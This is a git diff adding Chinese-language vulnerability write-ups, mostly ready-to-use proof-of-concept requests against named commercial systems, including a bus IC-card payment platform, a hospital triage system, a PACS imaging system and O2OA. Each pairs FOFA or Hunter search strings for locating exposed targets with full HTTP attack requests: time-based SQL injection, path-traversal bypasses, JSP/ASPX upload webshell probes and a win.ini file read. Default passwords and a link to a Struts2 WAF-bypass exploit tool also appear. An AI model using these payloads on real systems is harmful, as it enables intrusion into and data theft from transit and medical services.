+# 三、资产测绘
++ fofa`app="公交IC卡收单管理系统"`
++ 特征
+
+![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/85M-YfRK9InMkZ63/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-203251.png)
+
+# 四、漏洞复现
+```java
+POST /assets/..;/parametercard HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Priority: u=0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+ 
+method=select&organization=&lineCode=&_search=false&nd=1727249021156&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--
+```
+
+![1727274434961-80ba992d-1919-49df-a4ce-122d980cfdaa.png](./img/85M-YfRK9InMkZ63/1727274434961-80ba992d-1919-49df-a4ce-122d980cfdaa-709936.png)
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/en6kvkeehgrtgagx>
\ No newline at end of file
diff --git a/公交IC卡收单管理系统role存在SQL注入漏洞 2.md b/公交IC卡收单管理系统role存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..cd3b36c
--- /dev/null
+++ b/公交IC卡收单管理系统role存在SQL注入漏洞 2.md	
@@ -0,0 +1,42 @@
+# 公交IC卡收单管理系统role存在SQL注入漏洞
+
+公交IC卡收单管理系统role存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="公交IC卡收单管理系统"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /login HTTP/1.1
+Host: 
+Accept: */*
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+
+username=admin&password=e10adc3949ba59abbe56e057f20f883e
+```
+
+```javascript
+POST /role HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+
+_search=false&nd=1727245571646&rowCountPerPage=10&pageNo=1&sidx=ROLE_NAME&sord=asc&method=select&ROLE_NAME=1');WAITFOR DELAY '0:0:5'--
+```
+
diff --git a/公交IC卡收单管理系统role存在SQL注入漏洞.md b/公交IC卡收单管理系统role存在SQL注入漏洞.md
new file mode 100644
index 0000000..d33c7a0
--- /dev/null
+++ b/公交IC卡收单管理系统role存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 公交IC卡收单管理系统role存在SQL注入漏洞
+
+# 一、漏洞简介
+公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分，它通过集成先进的集成电路技术（IC卡）实现了乘客便捷的支付方式，并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块，为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验，还降低了公交公司的运营成本，提高了管理效率。公交IC卡收单管理系统 role存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+# 二、影响版本
++ 公交IC卡收单管理系统
+
+# 三、资产测绘
++ fofa`app="公交IC卡收单管理系统"`
++ 特征
+
+![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/dyW3C6ThOGt0sRum/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-157372.png)
+
+# 四、漏洞复现
+```java
+POST /assets/..;/role HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+ 
+_search=false&nd=1727245571646&rowCountPerPage=10&pageNo=1&sidx=ROLE_NAME&sord=asc&method=select&ROLE_NAME=1');WAITFOR DELAY '0:0:5'--
+```
+
+![1727274105161-0d35d76a-8101-4198-9b0a-9606dbc0777f.png](./img/dyW3C6ThOGt0sRum/1727274105161-0d35d76a-8101-4198-9b0a-9606dbc0777f-800904.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lntxyx716eea8fw2>
\ No newline at end of file
diff --git a/公交IC卡收单管理系统user存在SQL注入漏洞 2.md b/公交IC卡收单管理系统user存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..8860784
--- /dev/null
+++ b/公交IC卡收单管理系统user存在SQL注入漏洞 2.md	
@@ -0,0 +1,43 @@
+# 公交IC卡收单管理系统user存在SQL注入漏洞
+
+公交IC卡收单管理系统user存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="公交IC卡收单管理系统"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /login HTTP/1.1
+Host: 
+Accept: */*
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+
+username=admin&password=e10adc3949ba59abbe56e057f20f883e
+```
+
+```javascript
+POST /user HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+_search=false&nd=1727245865182&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=1');WAITFOR DELAY '0:0:5'--&REAL_NAME=1&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5
+```
+
+![image-20240926102454314](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261024373.png)
\ No newline at end of file
diff --git a/公交IC卡收单管理系统user存在SQL注入漏洞.md b/公交IC卡收单管理系统user存在SQL注入漏洞.md
new file mode 100644
index 0000000..711fdf7
--- /dev/null
+++ b/公交IC卡收单管理系统user存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 公交IC卡收单管理系统user存在SQL注入漏洞
+
+# 一、漏洞简介
+公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分，它通过集成先进的集成电路技术（IC卡）实现了乘客便捷的支付方式，并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块，为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验，还降低了公交公司的运营成本，提高了管理效率。公交IC卡收单管理系统user存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+# 二、影响版本
++ 公交IC卡收单管理系统
+
+# 三、资产测绘
++ fofa`app="公交IC卡收单管理系统"`
++ 特征
+
+![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/VRig3DHEJTaUgT5w/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-035673.png)
+
+# 四、漏洞复现
+```java
+POST /assets/..;/user HTTP/1.1
+Host: 
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ 
+_search=false&nd=1727245865182&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=1');WAITFOR DELAY '0:0:5'--&REAL_NAME=1&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5
+```
+
+![1727274189580-15d07235-6ddc-4c09-9a8e-60cac84cbade.png](./img/VRig3DHEJTaUgT5w/1727274189580-15d07235-6ddc-4c09-9a8e-60cac84cbade-972134.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cvq02glzy3c27bkm>
\ No newline at end of file
diff --git a/公交IC卡收单管理系统user存在信息泄露漏洞.md b/公交IC卡收单管理系统user存在信息泄露漏洞.md
new file mode 100644
index 0000000..03ba0d5
--- /dev/null
+++ b/公交IC卡收单管理系统user存在信息泄露漏洞.md
@@ -0,0 +1,41 @@
+# 公交IC卡收单管理系统user存在信息泄露漏洞
+
+### 一、漏洞描述
+天津环球磁卡股份有限公司公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分，它通过集成先进的集成电路技术（IC卡）实现了乘客便捷的支付方式，并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块，为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验，还降低了公交公司的运营成本，提高了管理效率。公交IC卡收单管理系统user存在信息泄露漏洞可获取超管用户密码等信息。
+
+### 二、影响版本
+公交IC卡收单管理系统
+
+### 三、资产测绘
+fofa：app="公交IC卡收单管理系统"
+
+![1728633619474-822ce325-951c-4d02-bd6a-b92b134a6a8f.webp](./img/EFit_Q9DuN2vcbtT/1728633619474-822ce325-951c-4d02-bd6a-b92b134a6a8f-256840.webp)
+
+### 四、漏洞复现
+```plain
+POST /assets/..;/user HTTP/1.1
+Host: xxx
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: application/json, text/javascript, */*; q=0.01
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+Priority: u=0
+Content-Length: 197
+
+_search=false&nd=1727275150716&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=&REAL_NAME=&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5
+```
+
+执行POC获取超管用户和MD5密码
+
+![1728633416844-f4af4914-dc37-4340-a849-0bec4e61ad5c.png](./img/EFit_Q9DuN2vcbtT/1728633416844-f4af4914-dc37-4340-a849-0bec4e61ad5c-096345.png)
+
+使用获取到的MD5密码进行解密并登录
+
+![1728633431240-2c38c0ba-5aba-4b3b-8b18-b9a33567e4c6.png](./img/EFit_Q9DuN2vcbtT/1728633431240-2c38c0ba-5aba-4b3b-8b18-b9a33567e4c6-507494.png)
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fi2seglgfyashlz8>
\ No newline at end of file
diff --git a/公交IC卡收单管理系统信息泄露漏洞.md b/公交IC卡收单管理系统信息泄露漏洞.md
new file mode 100644
index 0000000..8dadb2b
--- /dev/null
+++ b/公交IC卡收单管理系统信息泄露漏洞.md
@@ -0,0 +1,32 @@
+# 公交IC卡收单管理系统信息泄露漏洞
+
+公交IC卡收单管理系统信息泄露漏洞，通过泄露的账户密码 登录后台系统。
+
+## fofa
+
+```javascript
+app="公交IC卡收单管理系统"
+```
+
+## poc
+
+
+
+```javascript
+POST /assets/..;/user HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=B4B300824AA8F075EAC1E702454B91B
+AIf-None-Match: W/"8977-1726725363928"If-Modified-Since: Thu, 19 Sep 2024 05:56:03 GMT
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 197
+
+_search=false&nd=1727275150716&rowCountPerPage=10&pageNo=1&sidx=USER_NAME&sord=asc&method=select&USER_NAME=&REAL_NAME=&ACCOUNT_EXPIRE_TIME=%E5%BF%BD%E7%95%A5&PASSWORD_EXPIRE_TIME=%E5%BF%BD%E7%95%A5
+```
+
+![e00dcd3eb6fcdbc24bef62d405657e5a](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181606738.jpg)
\ No newline at end of file
diff --git a/公交IC卡收单管理系统存在弱口令漏洞.md b/公交IC卡收单管理系统存在弱口令漏洞.md
new file mode 100644
index 0000000..653b204
--- /dev/null
+++ b/公交IC卡收单管理系统存在弱口令漏洞.md
@@ -0,0 +1,25 @@
+# 公交IC卡收单管理系统存在弱口令漏洞
+
+# 一、漏洞简介
+公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分，它通过集成先进的集成电路技术（IC卡）实现了乘客便捷的支付方式，并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块，为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验，还降低了公交公司的运营成本，提高了管理效率。公交IC卡收单管理系统存在弱口令漏洞
+
+# 二、影响版本
++ 公交IC卡收单管理系统
+
+# 三、资产测绘
++ fofa`app="公交IC卡收单管理系统"`
++ 特征
+
+![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/5xuQfnVji22ps_P4/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-070180.png)
+
+# 四、漏洞复现
+```java
+admin/123456
+```
+
+![1727274524899-1cc62599-d132-4f3d-bc1c-4cca81d67551.png](./img/5xuQfnVji22ps_P4/1727274524899-1cc62599-d132-4f3d-bc1c-4cca81d67551-798965.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ng8rwq4zd0hos38v>
\ No newline at end of file
diff --git a/兰德网络O2OA存在默认口令漏洞.md b/兰德网络O2OA存在默认口令漏洞.md
new file mode 100644
index 0000000..b115384
--- /dev/null
+++ b/兰德网络O2OA存在默认口令漏洞.md
@@ -0,0 +1,26 @@
+# 兰德网络O2OA 存在默认口令漏洞
+
+# 一、漏洞简介
+O2OA是一个基于J2EE分布式架构，集成移动办公、智能办公，支持私有化部署，自适应负载能力的，能够很大程度上节约企业软件开发成本的基于AGPL协议开放源代码的企业信息化系统需求定制开发平台解决方案。O2OA 存在默认口令漏洞
+
+# 二、影响版本
++ O2OA 
+
+# 三、资产测绘
+```plain
+app="兰德网络-O2OA"
+```
+
+![1720675066609-6529d022-0d15-4038-9e2c-77ea7bdaab19.png](./img/OEpi5s7mIByPqKgH/1720675066609-6529d022-0d15-4038-9e2c-77ea7bdaab19-260404.png)
+
+# 四、漏洞复现
+```http
+xadmin/o2
+```
+
+![1720675096327-b608f121-b8c1-4d27-b172-b3fed2f0af04.png](./img/OEpi5s7mIByPqKgH/1720675096327-b608f121-b8c1-4d27-b172-b3fed2f0af04-496650.png)
+
+
+
+> 更新: 2024-08-12 17:16:00  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gug1y1s89hg9zp3m>
\ No newline at end of file
diff --git a/内训宝scorm存在任意文件上传漏洞.md b/内训宝scorm存在任意文件上传漏洞.md
new file mode 100644
index 0000000..18b6ebf
--- /dev/null
+++ b/内训宝scorm存在任意文件上传漏洞.md
@@ -0,0 +1,35 @@
+# 内训宝scorm存在任意文件上传漏洞
+​	北京内训宝科技有限公司是一家国内知名的在线教育基础服务提供商，专注于在线教育基础服务，并开发符合互联网发展潮流的在线教育产品。内寻宝为北京内训宝科技有限公司专门用于培训行业所开发的一款基于java的服务平台。
+
+​	内训宝企业培训平台 upload/scorm 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+```javascript
+body="static/nxb/css"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1735633027515-abcf8dc0-00f2-4a7e-8010-201e8988c38f.png)
+
+## poc
+```rust
+POST /upload/scorm HTTP/1.1
+Host: 
+Referer:
+Content-Type: multipart/form-data; boundary=----w80tipyzy4xm9y5cb2zk
+
+------w80tipyzy4xm9y5cb2zk
+Content-Disposition: form-data; name="fileupload"; filename="test.jsp"
+Content-Type: application/octet-stream
+
+<%out.print(111 * 111);%>
+------w80tipyzy4xm9y5cb2zk--
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1735632988296-f27321f3-ff02-4bcd-a588-b842f65bdb95.png)
+
+```rust
+/upload/imgdefault/common/20241231/1735632951571259198.jsp
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1735633008849-1dfcdf5e-404c-44f4-a970-5496683deb8c.png)
+
diff --git a/分诊叫号后台系统存在任意文件上传漏洞.md b/分诊叫号后台系统存在任意文件上传漏洞.md
new file mode 100644
index 0000000..5a24405
--- /dev/null
+++ b/分诊叫号后台系统存在任意文件上传漏洞.md
@@ -0,0 +1,61 @@
+# 分诊叫号后台系统存在任意文件上传漏洞
+北京神州视翰科技有限公司分诊叫号后台系统存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+## fofa
+
+```javascript
+title="分诊叫号后台"
+```
+
+## poc
+```javascript
+POST /api/doctor/ HTTP/1.1
+Host: 
+Content-Length: 756
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKZ5OA1LLddPA4mKc
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: need_login=
+Connection: close
+
+------WebKitFormBoundaryKZ5OA1LLddPA4mKc
+Content-Disposition: form-data; name="doctorid"
+
+0
+------WebKitFormBoundaryKZ5OA1LLddPA4mKc
+Content-Disposition: form-data; name="login_id"
+
+001.aspx
+------WebKitFormBoundaryKZ5OA1LLddPA4mKc
+Content-Disposition: form-data; name="name"
+
+22
+------WebKitFormBoundaryKZ5OA1LLddPA4mKc
+Content-Disposition: form-data; name="title"
+
+23
+------WebKitFormBoundaryKZ5OA1LLddPA4mKc
+Content-Disposition: form-data; name="department"
+
+24
+------WebKitFormBoundaryKZ5OA1LLddPA4mKc
+Content-Disposition: form-data; name="description"
+
+------WebKitFormBoundaryKZ5OA1LLddPA4mKc
+Content-Disposition: form-data; name="icon"; filename="11.txt"
+Content-Type: text/aspx
+
+<%@ Page Language="C#"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
+------WebKitFormBoundaryKZ5OA1LLddPA4mKc--
+```
+![image.png](https://cdn.nlark.com/yuque/0/2024/png/1622799/1713976131743-47c1a359-fac8-4890-a2b5-743c3d445850.png#averageHue=%23e8ecf0&clientId=ufb6cafc5-cf89-4&from=paste&height=812&id=udb9bff50&originHeight=1624&originWidth=3024&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1089367&status=done&style=none&taskId=u68119bb4-e3a1-4437-8755-12ecb261032&title=&width=1512)
+文件上传位置
+
+```
+/Web/images/001.aspx
+```
+![image.png](https://cdn.nlark.com/yuque/0/2024/png/1622799/1713976158425-390fe582-beb0-443a-ad68-6ed075d5ede4.png#averageHue=%23fdfdfd&clientId=ufb6cafc5-cf89-4&from=paste&height=548&id=ud04c290f&originHeight=1096&originWidth=2816&originalType=binary&ratio=2&rotation=0&showTitle=false&size=210193&status=done&style=none&taskId=uaabd67ae-1d19-481d-bda6-76dbed33dec&title=&width=1408)
diff --git a/勤云远程稿件处理系统存在SQL注入漏洞.md b/勤云远程稿件处理系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..b5bddb4
--- /dev/null
+++ b/勤云远程稿件处理系统存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 勤云远程稿件处理系统存在SQL注入漏洞
+
+勤云远程稿件处理系统 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="北京勤云科技"
+```
+
+## poc
+```javascript
+GET /burpsuite'if%20db_name(1)='master'%20waitfor%20delay%20'0:0:5'--/article/abstract/1 HTTP/1.1
+Host: 
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![image-20241227220754753](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272207815.png)
\ No newline at end of file
diff --git a/北京亚控科技img任意文件读取漏洞.md b/北京亚控科技img任意文件读取漏洞.md
new file mode 100644
index 0000000..68f7c9b
--- /dev/null
+++ b/北京亚控科技img任意文件读取漏洞.md
@@ -0,0 +1,29 @@
+## 北京亚控科技img任意文件读取漏洞
+
+KingPortal客户端开发系统 img 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="/public/javascripts/Common/Util/km_util.js"
+```
+
+## Hunter
+
+```javascript
+web.title="KingPortal"
+```
+
+## poc
+
+```javascript
+GET /kingclient/img?imgPath=..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241101191735975](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011917039.png)
diff --git a/北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行.md b/北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行.md
new file mode 100644
index 0000000..13333a5
--- /dev/null
+++ b/北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行.md
@@ -0,0 +1,23 @@
+# 北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行
+
+# 一、漏洞简介
+北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行
+
+# 二、影响版本
++ 北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台
+
+# 三、资产测绘
++ hunter`web.body="-- 页面顶部 系统标题在此DIV里面 --"`
++ 特征
+
+![1699199871837-15a06846-9583-4bea-a20e-e2025485d5cb.png](./img/Lu50_jtrtRQHC4nl/1699199871837-15a06846-9583-4bea-a20e-e2025485d5cb-687686.png)
+
+# 四、漏洞复现
+[Strruts2全版本漏洞测试工具17-6过WAF版.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222146639-f33e8db2-860b-488a-b0e6-07d9fb1de254.jar)
+
+![1699199907986-e5c65b64-a77e-4edc-a794-e428d55fd9e9.png](./img/Lu50_jtrtRQHC4nl/1699199907986-e5c65b64-a77e-4edc-a794-e428d55fd9e9-358960.png)
+
+
+
+> 更新: 2024-02-29 23:55:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pkp536m7nt5emrgx>
\ No newline at end of file
diff --git a/北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞.md b/北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞.md
new file mode 100644
index 0000000..49f50ab
--- /dev/null
+++ b/北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞
+
+# 一、漏洞简介
+北京新网医讯技术有限公司，公司成立于2000年3月，注册于北京中关村科技园，为国家高新技术企业和中关村高新技术企业（简称为“双高企业”），公司作为软件企业，成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS（放射科信息管理系统）的研究、开发工作。北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 北京新网医讯技术有限公司PACS系统web端
+
+# 三、特征
+![1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd.png](./img/DB_HHURFak5A5lyG/1700663401409-b03afed9-8f5b-4c03-8028-d8bfbc1528cd-580884.png)
+
+# 四、漏洞复现
+```plain
+POST / HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 448
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=aIvFnTxaMev%2BMuIasFWPO9198V98WVrTouBNTXTfDdlwXSECHrd5D4RQ6ge5pTRoYihFHyOQ1PfpTf5vaxEjyLRsSb73HPQsKfEOglWjAGo%3D&__EVENTVALIDATION=71o1HhunkN1yKTj5EmZeDoRkcgp5eEkODmWMf4usLX6jNBDWUPDiJBL7MyjboG6J9tKBMrpLafBCb7uKUMvQf5D5fJaarcxn0qfuG00MPr%2FuQJ4dDvXykErSvcEapjM99c2NwAq2u065oiyocPT%2FS%2BV%2BfU0lhZSlV5wDem2SrRLB38wmsXsy5dcVI8zEXxxy&TextName=admin'&TextPwd=admin'&BtnLogin=%E7%99%BB%E5%BD%95
+```
+
+![1700663680647-0bf946ca-4a2b-4008-af2e-1f668a183750.png](./img/DB_HHURFak5A5lyG/1700663680647-0bf946ca-4a2b-4008-af2e-1f668a183750-414790.png)
+
+
+
+> 更新: 2024-04-16 19:35:04  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hifk5gfkmueb2136>
\ No newline at end of file
diff --git a/北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞.md b/北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞.md
new file mode 100644
index 0000000..0cfbec5
--- /dev/null
+++ b/北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞.md
@@ -0,0 +1,23 @@
+# 北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞
+
+# 一、漏洞简介
